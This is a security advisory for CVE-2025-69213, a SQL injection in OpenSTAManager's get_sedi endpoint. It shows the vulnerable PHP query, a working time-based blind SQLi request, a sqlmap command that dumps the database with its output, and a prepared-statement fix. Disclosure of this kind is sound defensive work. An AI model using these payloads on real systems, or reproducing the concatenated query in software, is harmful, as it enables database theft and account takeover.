CVE-2025-69213
OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)
Description
## Summary A SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access. ## Proof of Concept ### Vulnerable Code **File:** `modules/anagrafiche/ajax/complete.php:28` ```php case 'get_sedi': $idanagrafica = get('idanagrafica'); $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione FROM an_sedi WHERE idanagrafica='".$idanagrafica."' ..."; $rs = $dbo->fetchArray($q); ``` ### Data Flow 1. **Source:** `$_GET['idanagrafica']` → `get('idanagrafica')` 2. **Vulnerable:** User input concatenated directly into SQL query with single quotes 3. **Sink:** `$dbo->fetchArray($q)` executes the malicious query ### Exploit **Manual PoC (Time-based Blind SQLi):** ```http GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=<valid-session> ``` <img width="1304" height="580" alt="image" src="https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8" /> **SQLMap Exploitation:** ```bash sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \ --cookie="PHPSESSID=<session>" \ --dbms=MySQL \ --technique=T \ --level=3 \ --dump ``` **SQLMap Output:** ``` [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF back-end DBMS: MySQL >= 5.0.12 ``` <img width="1284" height="745" alt="image" src="https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759" /> ## Impact - **Data Exfiltration:** Complete database extraction including user credentials, customer data, financial records - **Privilege Escalation:** Modification of `zz_users` table to gain admin access - **Data Integrity:** Unauthorized modification or deletion of records - **Potential RCE:** Via `SELECT ... INTO OUTFILE` if file permissions allow ## Affected Versions - OpenSTAManager: Verified in latest version (as of December 2025) - All versions using this endpoint are likely affected ## Remediation Replace direct concatenation with prepared statements: **Before:** ```php $idanagrafica = get('idanagrafica'); $q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ..."; ``` **After:** ```php $idanagrafica = get('idanagrafica'); $q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ..."; ``` ## Credit Discovered by: Łukasz Rybak